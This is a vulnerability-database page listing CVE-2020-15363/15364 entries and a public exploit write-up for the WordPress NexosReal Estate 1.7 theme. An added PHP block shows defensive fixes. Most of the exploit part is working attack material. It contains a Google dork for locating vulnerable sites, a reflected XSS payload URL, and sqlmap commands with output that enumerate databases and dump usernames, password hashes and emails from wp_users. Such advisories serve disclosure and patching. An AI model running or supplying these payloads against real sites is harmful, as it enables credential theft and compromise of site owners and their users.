| Title | Published | Views | Reporter |
|---|---|---|---|
| WordPress NexosReal Estate 1.7 Theme - (search_order) SQL Injection Vulnerability | 22 Jul 2020 00:00 | – | zdt |
| WordPress Nexos theme SQL Injection Vulnerability | 29 Jun 2020 00:00 | – | cnvd |
| WordPress Nexos theme cross-site scripting vulnerability | 29 Jun 2020 00:00 | – | cnvd |
| CVE-2020-15363 | 28 Jun 2020 11:48 | – | cve |
| CVE-2020-15364 | 28 Jun 2020 11:47 | – | cve |
| CVE-2020-15363 | 28 Jun 2020 11:48 | – | cvelist |
| CVE-2020-15364 | 28 Jun 2020 11:47 | – | cvelist |
| WordPress Theme Nexos Real Estate SQL Injection | 5 Aug 2020 00:00 | – | dsquare |
| EUVD-2020-7360 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2020-15363 | 28 Jun 2020 12:15 | – | nvd |
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Google Dork: inurl:/wp-content/themes/nexos/
# Date: 2020-06-17
# Exploit Author: Vlad Vector
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
# Software Version: 1.7
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Tested on: Debian 10
# CVE: CVE-2020-15363, CVE-2020-15364
# CWE: CWE-79, CWE-89
### [ Info: ]
[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
### [ Vulnerabilities: ]
[x] Unauthenticated Reflected XSS
[x] SQL Injection
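As an added defensive illustration (not the Nexos theme's code and not part of the original advisory): the `idlisting DESC` value in the PoC indicates that `search_order` is spliced into an ORDER BY clause, where bound parameters cannot protect identifiers, so the fix is an allow-list; the reflected `search_location` value needs attribute escaping before it is echoed. The function names, the constant names and every column name other than `idlisting` are assumptions.

```php
<?php
// Added example, not the theme's code: hardening sketch for the two issue
// classes in this advisory. The $_GET keys and "idlisting DESC" come from the
// PoC URLs; the other column names and the function names are assumptions.

const NEXOS_ORDER_COLUMNS = ['idlisting', 'price', 'date_added']; // assumed column set
const NEXOS_ORDER_DIRS    = ['ASC', 'DESC'];

// Build the ORDER BY fragment from ?search_order= by validation, not interpolation.
// Identifiers cannot be bound via prepared statements ($wpdb->prepare in WordPress),
// so anything outside the fixed set falls back to a safe default.
function nexos_safe_order_by(string $raw): string {
    $parts = preg_split('/\s+/', trim($raw));
    $col = $parts[0] ?? '';
    $dir = strtoupper($parts[1] ?? 'ASC');
    if (count($parts) > 2
        || !in_array($col, NEXOS_ORDER_COLUMNS, true)
        || !in_array($dir, NEXOS_ORDER_DIRS, true)) {
        return 'ORDER BY `idlisting` DESC';
    }
    return "ORDER BY `{$col}` {$dir}";
}

// ?search_location= is reflected into an HTML attribute, so it must be escaped
// for that context. WordPress provides esc_attr(); this is the plain-PHP equivalent.
function nexos_escape_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs modelled on the shape of the advisory's requests.
$orders = [
    'idlisting DESC',            // legitimate value from the PoC URL
    'price asc',                 // legitimate, normalised to upper-case direction
    'idlisting DESC,(SELECT 1)', // extra SQL tokens: rejected, default used
    '',                          // missing parameter: default used
];
foreach ($orders as $o) {
    echo str_pad(var_export($o, true), 30) . ' => ' . nexos_safe_order_by($o) . PHP_EOL;
}

$location = '"><img src=x onerror=alert(1)>'; // constructed hostile attribute value
echo '<input name="search_location" value="' . nexos_escape_attr($location) . '">' . PHP_EOL;
```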
### [ PoC Unauthenticated Reflected XSS: ]
[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com
### [ PoC SQL Injection: ]
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: TARGET-DB
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+